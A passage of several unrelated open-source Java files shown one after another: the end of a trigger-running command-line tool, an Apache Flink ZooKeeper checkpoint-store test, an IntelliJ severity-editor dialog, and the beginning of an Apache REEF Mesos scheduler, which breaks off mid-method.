null; String clientSecret = params.containsKey(CLIENTSECRET) ? params.get(CLIENTSECRET) : null; if(Util.isEmpty(clientId)){ log.error("Client ID not set."); }else{ if(Util.isEmpty(clientSecret)){ log.error("Client secret not set."); }else{ setAppId(clientId, clientSecret); TriggerHandler handler = new TriggerHandler(); handler.runTrigger(triggerIds, deviceIds); } } } /** * Delete tags. * @param params The parameters for the trigger. */ private static void deleteTags(Map<String, String> params){ log.info("Deleating tags..."); String tagStr = params.containsKey(TAGS) ? params.get(TAGS) : null; String[] tags = tagStr.split(","); String clientId = params.containsKey(CLIENTID) ? params.get(CLIENTID) : null; String clientSecret = params.containsKey(CLIENTSECRET) ? params.get(CLIENTSECRET) : null; if(Util.isEmpty(clientId)){ log.error("Client ID not set."); }else{ if(Util.isEmpty(clientSecret)){ log.error("Client secret not set."); }else{ setAppId(clientId, clientSecret); TriggerHandler handler = new TriggerHandler(); handler.deleteTags(tags); } } } private static void setAppId(String clientId, String clientSecret){ Params.get().setClientId(clientId); Params.get().setClientSecret(clientSecret); } }
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.flink.runtime.checkpoint; import org.apache.flink.api.common.JobID; import org.apache.flink.api.common.JobStatus; import org.apache.flink.api.java.tuple.Tuple2; import org.apache.flink.configuration.Configuration; import org.apache.flink.configuration.HighAvailabilityOptions; import org.apache.flink.runtime.operators.testutils.ExpectedTestException; import org.apache.flink.runtime.state.RetrievableStateHandle; import org.apache.flink.runtime.state.SharedStateRegistry; import org.apache.flink.runtime.state.testutils.TestCompletedCheckpointStorageLocation; import org.apache.flink.runtime.util.ZooKeeperUtils; import org.apache.flink.runtime.zookeeper.ZooKeeperResource; import org.apache.flink.runtime.zookeeper.ZooKeeperStateHandleStore; import org.apache.flink.util.ExceptionUtils; import org.apache.flink.util.TestLogger; import org.apache.flink.util.concurrent.Executors; import org.apache.flink.util.function.TriConsumer; import org.apache.flink.shaded.curator4.org.apache.curator.framework.CuratorFramework; import org.hamcrest.Matchers; import org.junit.ClassRule; import org.junit.Test; import javax.annotation.Nonnull; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.concurrent.CountDownLatch; import java.util.function.Function; import java.util.stream.IntStream; import static org.apache.flink.runtime.checkpoint.CheckpointRetentionPolicy.NEVER_RETAIN_AFTER_TERMINATION; import static org.apache.flink.runtime.checkpoint.CompletedCheckpointStoreTest.createCheckpoint; import static org.apache.flink.util.ExceptionUtils.findThrowable; import static org.apache.flink.util.ExceptionUtils.rethrow; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertThat; /** Tests for {@link DefaultCompletedCheckpointStore} with {@link ZooKeeperStateHandleStore}. */ public class ZooKeeperCompletedCheckpointStoreTest extends TestLogger { @ClassRule public static ZooKeeperResource zooKeeperResource = new ZooKeeperResource(); private static final ZooKeeperCheckpointStoreUtil zooKeeperCheckpointStoreUtil = ZooKeeperCheckpointStoreUtil.INSTANCE; @Test public void testPathConversion() { final long checkpointId = 42L; final String path = zooKeeperCheckpointStoreUtil.checkpointIDToName(checkpointId); assertEquals(checkpointId, zooKeeperCheckpointStoreUtil.nameToCheckpointID(path)); } @Test(expected = ExpectedTestException.class) public void testRecoverFailsIfDownloadFails() throws Exception { testDownloadInternal( (store, checkpointsInZk, sharedStateRegistry) -> { try { checkpointsInZk.add( createHandle( 1, id -> { throw new ExpectedTestException(); })); store.recover(); } catch (Exception exception) { findThrowable(exception, ExpectedTestException.class) .ifPresent(ExceptionUtils::rethrow); rethrow(exception); } }); } @Test public void testNoDownloadIfCheckpointsNotChanged() throws Exception { testDownloadInternal( (store, checkpointsInZk, sharedStateRegistry) -> { try { checkpointsInZk.add( createHandle( 1, id -> { throw new AssertionError( "retrieveState was attempted for checkpoint " + id); })); store.addCheckpoint( createCheckpoint(1, sharedStateRegistry), new CheckpointsCleaner(), () -> { /*no op*/ }); store.recover(); // will fail in case of attempt to retrieve state } catch (Exception exception) { throw new RuntimeException(exception); } }); } @Test public void testDownloadIfCheckpointsChanged() throws Exception { testDownloadInternal( (store, checkpointsInZk, sharedStateRegistry) -> { try { int lastInZk = 10; IntStream.range(0, lastInZk + 1) .forEach( i -> checkpointsInZk.add( createHandle( i, id -> createCheckpoint( id, sharedStateRegistry)))); store.addCheckpoint( createCheckpoint(1, sharedStateRegistry), new CheckpointsCleaner(), () -> { /*no op*/ }); store.addCheckpoint( createCheckpoint(5, sharedStateRegistry), new CheckpointsCleaner(), () -> { /*no op*/ }); store.recover(); assertEquals(lastInZk, store.getLatestCheckpoint(false).getCheckpointID()); } catch (Exception exception) { throw new RuntimeException(exception); } }); } private void testDownloadInternal( TriConsumer< CompletedCheckpointStore, List<Tuple2<RetrievableStateHandle<CompletedCheckpoint>, String>>, SharedStateRegistry> test) throws Exception { SharedStateRegistry sharedStateRegistry = new SharedStateRegistry(); Configuration configuration = new Configuration(); configuration.setString( HighAvailabilityOptions.HA_ZOOKEEPER_QUORUM, zooKeeperResource.getConnectString()); List<Tuple2<RetrievableStateHandle<CompletedCheckpoint>, String>> checkpointsInZk = new ArrayList<>(); ZooKeeperStateHandleStore<CompletedCheckpoint> checkpointsInZooKeeper = new ZooKeeperStateHandleStore<CompletedCheckpoint>( ZooKeeperUtils.startCuratorFramework(configuration), new TestingRetrievableStateStorageHelper<>()) { @Override public List<Tuple2<RetrievableStateHandle<CompletedCheckpoint>, String>> getAllAndLock() { return checkpointsInZk; } }; CompletedCheckpointStore store = new DefaultCompletedCheckpointStore<>( 10, checkpointsInZooKeeper, zooKeeperCheckpointStoreUtil, Executors.directExecutor()); try { test.accept(store, checkpointsInZk, sharedStateRegistry); } finally { store.shutdown(JobStatus.FINISHED, new CheckpointsCleaner()); sharedStateRegistry.close(); } } private Tuple2<RetrievableStateHandle<CompletedCheckpoint>, String> createHandle( long id, Function<Long, CompletedCheckpoint> checkpointSupplier) { return Tuple2.of( new CheckpointStateHandle(checkpointSupplier, id), zooKeeperCheckpointStoreUtil.checkpointIDToName(id)); } /** Tests that subsumed checkpoints are discarded. */ @Test public void testDiscardingSubsumedCheckpoints() throws Exception { final SharedStateRegistry sharedStateRegistry = new SharedStateRegistry(); final Configuration configuration = new Configuration(); configuration.setString( HighAvailabilityOptions.HA_ZOOKEEPER_QUORUM, zooKeeperResource.getConnectString()); final CuratorFramework client = ZooKeeperUtils.startCuratorFramework(configuration); final CompletedCheckpointStore checkpointStore = createZooKeeperCheckpointStore(client); try { final CompletedCheckpointStoreTest.TestCompletedCheckpoint checkpoint1 = CompletedCheckpointStoreTest.createCheckpoint(0, sharedStateRegistry); checkpointStore.addCheckpoint(checkpoint1, new CheckpointsCleaner(), () -> {}); assertThat(checkpointStore.getAllCheckpoints(), Matchers.contains(checkpoint1)); final CompletedCheckpointStoreTest.TestCompletedCheckpoint checkpoint2 = CompletedCheckpointStoreTest.createCheckpoint(1, sharedStateRegistry); checkpointStore.addCheckpoint(checkpoint2, new CheckpointsCleaner(), () -> {}); final List<CompletedCheckpoint> allCheckpoints = checkpointStore.getAllCheckpoints(); assertThat(allCheckpoints, Matchers.contains(checkpoint2)); assertThat(allCheckpoints, Matchers.not(Matchers.contains(checkpoint1))); // verify that the subsumed checkpoint is discarded CompletedCheckpointStoreTest.verifyCheckpointDiscarded(checkpoint1); } finally { client.close(); } } /** * Tests that checkpoints are discarded when the completed checkpoint store is shut down with a * globally terminal state. */ @Test public void testDiscardingCheckpointsAtShutDown() throws Exception { final SharedStateRegistry sharedStateRegistry = new SharedStateRegistry(); final Configuration configuration = new Configuration(); configuration.setString( HighAvailabilityOptions.HA_ZOOKEEPER_QUORUM, zooKeeperResource.getConnectString()); final CuratorFramework client = ZooKeeperUtils.startCuratorFramework(configuration); final CompletedCheckpointStore checkpointStore = createZooKeeperCheckpointStore(client); try { final CompletedCheckpointStoreTest.TestCompletedCheckpoint checkpoint1 = CompletedCheckpointStoreTest.createCheckpoint(0, sharedStateRegistry); checkpointStore.addCheckpoint(checkpoint1, new CheckpointsCleaner(), () -> {}); assertThat(checkpointStore.getAllCheckpoints(), Matchers.contains(checkpoint1)); checkpointStore.shutdown(JobStatus.FINISHED, new CheckpointsCleaner()); // verify that the checkpoint is discarded CompletedCheckpointStoreTest.verifyCheckpointDiscarded(checkpoint1); } finally { client.close(); } } @Nonnull private CompletedCheckpointStore createZooKeeperCheckpointStore(CuratorFramework client) throws Exception { final ZooKeeperStateHandleStore<CompletedCheckpoint> checkpointsInZooKeeper = ZooKeeperUtils.createZooKeeperStateHandleStore( client, "/checkpoints", new TestingRetrievableStateStorageHelper<>()); return new DefaultCompletedCheckpointStore<>( 1, checkpointsInZooKeeper, zooKeeperCheckpointStoreUtil, Executors.directExecutor()); } private static class CheckpointStateHandle implements RetrievableStateHandle<CompletedCheckpoint> { private static final long serialVersionUID = 1L; private final Function<Long, CompletedCheckpoint> checkpointSupplier; private final long id; CheckpointStateHandle(Function<Long, CompletedCheckpoint> checkpointSupplier, long id) { this.checkpointSupplier = checkpointSupplier; this.id = id; } @Override public CompletedCheckpoint retrieveState() { return checkpointSupplier.apply(id); } @Override public void discardState() {} @Override public long getStateSize() { return 0; } } /** * Tests that the checkpoint does not exist in the store when we fail to add it into the store * (i.e., there exists an exception thrown by the method). */ @Test public void testAddCheckpointWithFailedRemove() throws Exception { final int numCheckpointsToRetain = 1; final Configuration configuration = new Configuration(); configuration.setString( HighAvailabilityOptions.HA_ZOOKEEPER_QUORUM, zooKeeperResource.getConnectString()); final CuratorFramework client = ZooKeeperUtils.startCuratorFramework(configuration); final CompletedCheckpointStore store = createZooKeeperCheckpointStore(client); CountDownLatch discardAttempted = new CountDownLatch(1); for (long i = 0; i < numCheckpointsToRetain + 1; ++i) { CompletedCheckpoint checkpointToAdd = new CompletedCheckpoint( new JobID(), i, i, i, Collections.emptyMap(), Collections.emptyList(), CheckpointProperties.forCheckpoint(NEVER_RETAIN_AFTER_TERMINATION), new TestCompletedCheckpointStorageLocation()); // shouldn't fail despite the exception store.addCheckpoint( checkpointToAdd, new CheckpointsCleaner(), () -> { discardAttempted.countDown(); throw new RuntimeException(); }); } discardAttempted.await(); } }
// Copyright 2000-2018 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file. package com.intellij.codeInspection.ex; import com.intellij.application.options.colors.ColorAndFontDescriptionPanel; import com.intellij.application.options.colors.InspectionColorSettingsPage; import com.intellij.application.options.colors.TextAttributesDescription; import com.intellij.codeInsight.daemon.impl.HighlightInfoType; import com.intellij.codeInsight.daemon.impl.SeverityRegistrar; import com.intellij.codeInsight.daemon.impl.SeverityUtil; import com.intellij.codeInspection.InspectionsBundle; import com.intellij.ide.DataManager; import com.intellij.lang.annotation.HighlightSeverity; import com.intellij.openapi.actionSystem.AnActionEvent; import com.intellij.openapi.actionSystem.DataContext; import com.intellij.openapi.diagnostic.Logger; import com.intellij.openapi.editor.colors.CodeInsightColors; import com.intellij.openapi.editor.colors.TextAttributesKey; import com.intellij.openapi.editor.markup.TextAttributes; import com.intellij.openapi.project.Project; import com.intellij.openapi.ui.DialogWrapper; import com.intellij.openapi.ui.InputValidator; import com.intellij.openapi.ui.Messages; import com.intellij.openapi.util.Comparing; import com.intellij.openapi.util.text.StringUtil; import com.intellij.profile.codeInspection.ui.SingleInspectionProfilePanel; import com.intellij.ui.*; import com.intellij.ui.components.JBList; import com.intellij.util.Consumer; import com.intellij.util.ui.JBUI; import org.jdom.Element; import org.jetbrains.annotations.NonNls; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import javax.swing.*; import javax.swing.event.ListSelectionEvent; import javax.swing.event.ListSelectionListener; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import java.util.*; import java.util.List; import static com.intellij.application.options.colors.ColorAndFontOptions.selectOrEditColor; import static com.intellij.codeInsight.daemon.impl.SeverityRegistrar.SeverityBasedTextAttributes; public class SeverityEditorDialog extends DialogWrapper { private static final Logger LOG = Logger.getInstance(SeverityEditorDialog.class); private final JPanel myPanel; private final JList<SeverityBasedTextAttributes> myOptionsList = new JBList<>(); private final ColorAndFontDescriptionPanel myOptionsPanel = new ColorAndFontDescriptionPanel(); private SeverityBasedTextAttributes myCurrentSelection; private final SeverityRegistrar mySeverityRegistrar; private final boolean myCloseDialogWhenSettingsShown; private final CardLayout myCard; private final JPanel myRightPanel; @NonNls private static final String DEFAULT = "DEFAULT"; @NonNls private static final String EDITABLE = "EDITABLE"; public static void show(@NotNull Project project, @Nullable HighlightSeverity selectedSeverity, @NotNull SeverityRegistrar severityRegistrar, boolean closeDialogWhenSettingsShown, @Nullable Consumer<HighlightSeverity> chosenSeverityCallback) { final SeverityEditorDialog dialog = new SeverityEditorDialog(project, selectedSeverity, severityRegistrar, closeDialogWhenSettingsShown); if (dialog.showAndGet()) { final HighlightInfoType type = dialog.getSelectedType(); if (type != null) { final HighlightSeverity severity = type.getSeverity(null); if (chosenSeverityCallback != null) { chosenSeverityCallback.consume(severity); } } } } private SeverityEditorDialog(@NotNull Project project, @Nullable HighlightSeverity selectedSeverity, @NotNull SeverityRegistrar severityRegistrar, boolean closeDialogWhenSettingsShown) { super(project, true); mySeverityRegistrar = severityRegistrar; myCloseDialogWhenSettingsShown = closeDialogWhenSettingsShown; myOptionsList.setCellRenderer(new DefaultListCellRenderer() { @Override public Component getListCellRendererComponent(JList list, Object value, int index, boolean isSelected, boolean cellHasFocus) { final Component rendererComponent = super.getListCellRendererComponent(list, value, index, isSelected, cellHasFocus); setText(SingleInspectionProfilePanel.renderSeverity(((SeverityBasedTextAttributes)value).getSeverity())); return rendererComponent; } }); myOptionsList.addListSelectionListener(new ListSelectionListener() { @Override public void valueChanged(ListSelectionEvent e) { if (myCurrentSelection != null) { apply(myCurrentSelection); } myCurrentSelection = myOptionsList.getSelectedValue(); if (myCurrentSelection != null) { reset(myCurrentSelection); myCard.show(myRightPanel, SeverityRegistrar.isDefaultSeverity(myCurrentSelection.getSeverity()) ? DEFAULT : EDITABLE); } } }); TreeUIHelper.getInstance().installListSpeedSearch(myOptionsList, attrs -> attrs.getSeverity().getName()); myOptionsList.setSelectionMode(ListSelectionModel.SINGLE_SELECTION); JPanel leftPanel = ToolbarDecorator.createDecorator(myOptionsList) .setAddAction(new AnActionButtonRunnable() { @Override public void run(AnActionButton button) { final String name = Messages.showInputDialog(myPanel, InspectionsBundle.message("highlight.severity.create.dialog.name.label"), InspectionsBundle.message("highlight.severity.create.dialog.title"), Messages.getQuestionIcon(), "", new InputValidator() { @Override public boolean checkInput(final String inputString) { return checkNameExist(inputString); } @Override public boolean canClose(final String inputString) { return checkInput(inputString); } }); if (name == null) return; SeverityBasedTextAttributes newSeverityBasedTextAttributes = createSeverity(name, CodeInsightColors.WARNINGS_ATTRIBUTES.getDefaultAttributes()); ((DefaultListModel<SeverityBasedTextAttributes>)myOptionsList.getModel()).addElement(newSeverityBasedTextAttributes); select(newSeverityBasedTextAttributes); } }).setMoveUpAction(new AnActionButtonRunnable() { @Override public void run(AnActionButton button) { apply(myCurrentSelection); ListUtil.moveSelectedItemsUp(myOptionsList); } }).setMoveDownAction(new AnActionButtonRunnable() { @Override public void run(AnActionButton button) { apply(myCurrentSelection); ListUtil.moveSelectedItemsDown(myOptionsList); } }).setEditAction(new AnActionButtonRunnable() { @Override public void run(AnActionButton button) { String oldName = myCurrentSelection.getSeverity().getName(); String newName = Messages.showInputDialog(myPanel, InspectionsBundle.message("highlight.severity.create.dialog.name.label"), "Edit Severity Name", null, oldName, new InputValidator() { @Override public boolean checkInput(String inputString) { return checkNameExist(inputString); } @Override public boolean canClose(String inputString) { return checkInput(inputString); } }); if (newName != null && !oldName.equals(newName)) { SeverityBasedTextAttributes newSeverityBasedTextAttributes = createSeverity(newName, myCurrentSelection.getAttributes()); int index = myOptionsList.getSelectedIndex(); ((DefaultListModel<SeverityBasedTextAttributes>)myOptionsList.getModel()).set(index, newSeverityBasedTextAttributes); select(newSeverityBasedTextAttributes); } } }).setEditActionUpdater(new AnActionButtonUpdater() { @Override public boolean isEnabled(AnActionEvent e) { return myCurrentSelection != null && !SeverityRegistrar.isDefaultSeverity(myCurrentSelection.getSeverity()); } }).setEditActionName("Rename").createPanel(); ToolbarDecorator.findRemoveButton(leftPanel).addCustomUpdater(new AnActionButtonUpdater() { @Override public boolean isEnabled(AnActionEvent e) { return !SeverityRegistrar.isDefaultSeverity(myOptionsList.getSelectedValue().getSeverity()); } }); ToolbarDecorator.findUpButton(leftPanel).addCustomUpdater(new AnActionButtonUpdater() { @Override public boolean isEnabled(AnActionEvent e) { boolean canMove = ListUtil.canMoveSelectedItemsUp(myOptionsList); if (canMove) { SeverityBasedTextAttributes pair = myOptionsList.getSelectedValue(); if (pair != null && SeverityRegistrar.isDefaultSeverity(pair.getSeverity())) { final int newPosition = myOptionsList.getSelectedIndex() - 1; pair = myOptionsList.getModel().getElementAt(newPosition); if (SeverityRegistrar.isDefaultSeverity(pair.getSeverity())) { canMove = false; } } } return canMove; } }); ToolbarDecorator.findDownButton(leftPanel).addCustomUpdater(new AnActionButtonUpdater() { @Override public boolean isEnabled(AnActionEvent e) { boolean canMove = ListUtil.canMoveSelectedItemsDown(myOptionsList); if (canMove) { SeverityBasedTextAttributes pair = myOptionsList.getSelectedValue(); if (pair != null && SeverityRegistrar.isDefaultSeverity(pair.getSeverity())) { final int newPosition = myOptionsList.getSelectedIndex() + 1; pair = myOptionsList.getModel().getElementAt(newPosition); if (SeverityRegistrar.isDefaultSeverity(pair.getSeverity())) { canMove = false; } } } return canMove; } }); myPanel = new JPanel(new BorderLayout()); myPanel.add(leftPanel, BorderLayout.CENTER); myCard = new CardLayout(); myRightPanel = new JPanel(myCard); final JPanel disabled = new JPanel(new GridBagLayout()); final JButton button = new JButton(InspectionsBundle.message("severities.default.settings.message")); button.addActionListener(new ActionListener() { @Override public void actionPerformed(final ActionEvent e) { editColorsAndFonts(); } }); disabled.add(button, new GridBagConstraints(0, 0, 1, 1, 0, 0, GridBagConstraints.CENTER, GridBagConstraints.NONE, JBUI.emptyInsets(), 0, 0)); myRightPanel.add(DEFAULT, disabled); myRightPanel.add(EDITABLE, myOptionsPanel); myCard.show(myRightPanel, EDITABLE); myPanel.add(myRightPanel, BorderLayout.EAST); fillList(selectedSeverity); init(); setTitle(InspectionsBundle.message("severities.editor.dialog.title")); reset(myOptionsList.getSelectedValue()); } @NotNull public SeverityBasedTextAttributes createSeverity(@NotNull String name, @NotNull TextAttributes parent) { HighlightInfoType.HighlightInfoTypeImpl info = new HighlightInfoType.HighlightInfoTypeImpl(new HighlightSeverity(name, 50), TextAttributesKey .createTextAttributesKey(name)); return new SeverityBasedTextAttributes(parent.clone(), info); } public void select(SeverityBasedTextAttributes newSeverityBasedTextAttributes) { myOptionsList.clearSelection(); ScrollingUtil.selectItem(myOptionsList, newSeverityBasedTextAttributes); } private boolean checkNameExist(@NotNull String newName) { if (StringUtil.isEmpty(newName)) return false; final ListModel listModel = myOptionsList.getModel(); for (int i = 0; i < listModel.getSize(); i++) { final String severityName = ((SeverityBasedTextAttributes)listModel.getElementAt(i)).getSeverity().myName; if (Comparing.strEqual(severityName, newName, false)) return false; } return true; } private void editColorsAndFonts() { final String toConfigure = Objects.requireNonNull(getSelectedType()).getSeverity(null).myName; if (myCloseDialogWhenSettingsShown) { doOKAction(); } myOptionsList.clearSelection(); final DataContext dataContext = DataManager.getInstance().getDataContext(myPanel); selectOrEditColor(dataContext, toConfigure, InspectionColorSettingsPage.class); } private void fillList(final @Nullable HighlightSeverity severity) { DefaultListModel<SeverityBasedTextAttributes> model = new DefaultListModel<>(); final List<SeverityBasedTextAttributes> infoTypes = new ArrayList<>(SeverityUtil.getRegisteredHighlightingInfoTypes(mySeverityRegistrar)); SeverityBasedTextAttributes preselection = null; for (SeverityBasedTextAttributes type : infoTypes) { model.addElement(type); if (type.getSeverity().equals(severity)) { preselection = type; } } if (preselection == null && !infoTypes.isEmpty()) { preselection = infoTypes.get(0); } myOptionsList.setModel(model); myOptionsList.setSelectedValue(preselection, true); } private void apply(SeverityBasedTextAttributes info) { if (info == null) { return; } MyTextAttributesDescription description = new MyTextAttributesDescription(info.getType().toString(), null, new TextAttributes(), info.getType().getAttributesKey()); myOptionsPanel.apply(description, null); Element textAttributes = new Element("temp"); try { description.getTextAttributes().writeExternal(textAttributes); info.getAttributes().readExternal(textAttributes); } catch (Exception e) { LOG.error(e); } } private void reset(SeverityBasedTextAttributes info) { if (info == null) { return; } final MyTextAttributesDescription description = new MyTextAttributesDescription(info.getType().toString(), null, info.getAttributes(), info.getType().getAttributesKey()); @NonNls Element textAttributes = new Element("temp"); try { info.getAttributes().writeExternal(textAttributes); description.getTextAttributes().readExternal(textAttributes); } catch (Exception e) { LOG.error(e); } myOptionsPanel.reset(description); } @Override protected void doOKAction() { apply(myOptionsList.getSelectedValue()); final Collection<SeverityBasedTextAttributes> infoTypes = new HashSet<>(SeverityUtil.getRegisteredHighlightingInfoTypes(mySeverityRegistrar)); final ListModel listModel = myOptionsList.getModel(); final List<HighlightSeverity> order = new ArrayList<>(); for (int i = listModel.getSize() - 1; i >= 0; i--) { SeverityBasedTextAttributes info = (SeverityBasedTextAttributes)listModel.getElementAt(i); order.add(info.getSeverity()); if (!SeverityRegistrar.isDefaultSeverity(info.getSeverity())) { infoTypes.remove(info); final Color stripeColor = info.getAttributes().getErrorStripeColor(); final boolean exists = mySeverityRegistrar.getSeverity(info.getSeverity().getName()) != null; if (exists) { info.getType().getAttributesKey().getDefaultAttributes().setErrorStripeColor(stripeColor); } else { HighlightInfoType.HighlightInfoTypeImpl type = info.getType(); TextAttributesKey key = type.getAttributesKey(); final TextAttributes defaultAttributes = key.getDefaultAttributes().clone(); defaultAttributes.setErrorStripeColor(stripeColor); key = TextAttributesKey.createTextAttributesKey(key.getExternalName(), defaultAttributes); type = new HighlightInfoType.HighlightInfoTypeImpl(type.getSeverity(null), key); info = new SeverityBasedTextAttributes(info.getAttributes(), type); } mySeverityRegistrar.registerSeverity(info, stripeColor != null ? stripeColor : LightColors.YELLOW); } } for (SeverityBasedTextAttributes info : infoTypes) { mySeverityRegistrar.unregisterSeverity(info.getSeverity()); } mySeverityRegistrar.setOrder(order); super.doOKAction(); } @Override @Nullable protected JComponent createCenterPanel() { return myPanel; } @Nullable public HighlightInfoType getSelectedType() { final SeverityBasedTextAttributes selection = myOptionsList.getSelectedValue(); return selection != null ? selection.getType() : null; } private static class MyTextAttributesDescription extends TextAttributesDescription { public MyTextAttributesDescription(final String name, final String group, final TextAttributes attributes, final TextAttributesKey type) { super(name, group, attributes, type, null, null, null); } @Override public boolean isErrorStripeEnabled() { return true; } @Override public TextAttributes getTextAttributes() { return super.getTextAttributes(); } } }
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.reef.runtime.mesos.driver; import com.google.protobuf.ByteString; import org.apache.mesos.MesosSchedulerDriver; import org.apache.reef.proto.ReefServiceProtos; import org.apache.reef.runtime.common.driver.api.ResourceReleaseEvent; import org.apache.reef.runtime.common.driver.api.ResourceRequestEvent; import org.apache.reef.runtime.common.driver.api.ResourceRequestEventImpl; import org.apache.reef.runtime.common.driver.evaluator.pojos.State; import org.apache.reef.runtime.common.driver.parameters.JobIdentifier; import org.apache.reef.runtime.common.driver.resourcemanager.NodeDescriptorEventImpl; import org.apache.reef.runtime.common.driver.resourcemanager.ResourceAllocationEvent; import org.apache.reef.runtime.common.driver.resourcemanager.ResourceEventImpl; import org.apache.reef.runtime.common.driver.resourcemanager.ResourceStatusEvent; import org.apache.reef.runtime.common.driver.resourcemanager.ResourceStatusEventImpl; import org.apache.reef.runtime.common.driver.resourcemanager.RuntimeStatusEventImpl; import org.apache.reef.runtime.common.files.ClasspathProvider; import org.apache.reef.runtime.common.files.REEFFileNames; import org.apache.reef.runtime.mesos.driver.parameters.MesosMasterIp; import org.apache.reef.runtime.mesos.driver.parameters.MesosSlavePort; import org.apache.reef.runtime.mesos.driver.parameters.JobSubmissionDirectoryPrefix; import org.apache.reef.runtime.mesos.evaluator.REEFExecutor; import org.apache.reef.runtime.mesos.util.EvaluatorControl; import org.apache.reef.runtime.mesos.util.EvaluatorRelease; import org.apache.reef.runtime.mesos.util.MesosRemoteManager; import org.apache.reef.tang.annotations.Parameter; import org.apache.reef.wake.EStage; import org.apache.reef.wake.EventHandler; import org.apache.reef.wake.remote.Encoder; import org.apache.reef.wake.remote.impl.ObjectSerializableCodec; import org.apache.commons.compress.archivers.tar.TarArchiveEntry; import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream; import org.apache.commons.compress.utils.IOUtils; import org.apache.commons.lang.StringUtils; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FileSystem; import org.apache.mesos.Protos; import org.apache.mesos.Protos.CommandInfo; import org.apache.mesos.Protos.CommandInfo.URI; import org.apache.mesos.Protos.ExecutorID; import org.apache.mesos.Protos.ExecutorInfo; import org.apache.mesos.Protos.Filters; import org.apache.mesos.Protos.Offer; import org.apache.mesos.Protos.Resource; import org.apache.mesos.Protos.TaskID; import org.apache.mesos.Protos.TaskInfo; import org.apache.mesos.Protos.Value; import org.apache.mesos.Protos.Value.Type; import org.apache.mesos.Scheduler; import org.apache.mesos.SchedulerDriver; import javax.inject.Inject; import java.io.BufferedInputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.nio.file.DirectoryStream; import java.nio.file.Files; import java.nio.file.Path; import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ConcurrentLinkedQueue; import java.util.logging.Level; import java.util.logging.Logger; import java.util.zip.GZIPOutputStream; /** * MesosScheduler that interacts with MesosMaster and MesosExecutors. */ final class REEFScheduler implements Scheduler { private static final Logger LOG = Logger.getLogger(REEFScheduler.class.getName()); private static final String REEF_TAR = "reef.tar.gz"; private static final String RUNTIME_NAME = "MESOS"; private static final String REEF_JOB_NAME_PREFIX = "reef-job-"; private final String reefTarUri; private final REEFFileNames fileNames; private final ClasspathProvider classpath; private final REEFEventHandlers reefEventHandlers; private final MesosRemoteManager mesosRemoteManager; private final SchedulerDriver mesosMaster; private int mesosSlavePort; private final String jobSubmissionDirectoryPrefix; private final EStage<SchedulerDriver> schedulerDriverEStage; private final Map<String, Offer> offers = new ConcurrentHashMap<>(); private int outstandingRequestCounter = 0; private final ConcurrentLinkedQueue<ResourceRequestEvent> outstandingRequests = new ConcurrentLinkedQueue<>(); private final Map<String, ResourceRequestEvent> executorIdToLaunchedRequests = new ConcurrentHashMap<>(); private final REEFExecutors executors; @Inject REEFScheduler(final REEFEventHandlers reefEventHandlers, final MesosRemoteManager mesosRemoteManager, final REEFExecutors executors, final REEFFileNames fileNames, final EStage<SchedulerDriver> schedulerDriverEStage, final ClasspathProvider classpath, @Parameter(JobIdentifier.class) final String jobIdentifier, @Parameter(MesosMasterIp.class) final String masterIp, @Parameter(MesosSlavePort.class) final int slavePort, @Parameter(JobSubmissionDirectoryPrefix.class) final String jobSubmissionDirectoryPrefix) { this.mesosRemoteManager = mesosRemoteManager; this.reefEventHandlers = reefEventHandlers; this.executors = executors; this.fileNames = fileNames; this.jobSubmissionDirectoryPrefix = jobSubmissionDirectoryPrefix; this.reefTarUri = getReefTarUri(jobIdentifier); this.classpath = classpath; this.schedulerDriverEStage = schedulerDriverEStage; final Protos.FrameworkInfo frameworkInfo = Protos.FrameworkInfo.newBuilder() .setUser("") .setName(REEF_JOB_NAME_PREFIX + jobIdentifier) .build(); this.mesosMaster = new MesosSchedulerDriver(this, frameworkInfo, masterIp); this.mesosSlavePort = slavePort; } @Override public void registered(final SchedulerDriver driver, final Protos.FrameworkID frameworkId, final Protos.MasterInfo masterInfo) { LOG.log(Level.INFO, "Framework ID={0} registration succeeded", frameworkId); } @Override public void reregistered(final SchedulerDriver driver, final Protos.MasterInfo masterInfo) { LOG.log(Level.INFO, "Framework reregistered, MasterInfo: {0}", masterInfo); } /** * All offers in each batch of offers will be either be launched or declined. */ @Override @SuppressWarnings("checkstyle:hiddenfield") public void resourceOffers(final SchedulerDriver driver, final List<Protos.Offer> offers) { final Map<String, NodeDescriptorEventImpl.Builder> nodeDescriptorEvents = new HashMap<>(); for (final Offer offer : offers) { if (nodeDescriptorEvents.get(offer.getSlaveId().getValue()) == null) { nodeDescriptorEvents.put(offer.getSlaveId().getValue(), NodeDescriptorEventImpl.newBuilder() .setIdentifier(offer.getSlaveId().getValue()) .setHostName(offer.getHostname()) .setPort(this.mesosSlavePort) .setMemorySize(getMemory(offer))); } else { final NodeDescriptorEventImpl.Builder builder = nodeDescriptorEvents.get(offer.getSlaveId().getValue()); builder.setMemorySize(builder.build().getMemorySize() + getMemory(offer)); } 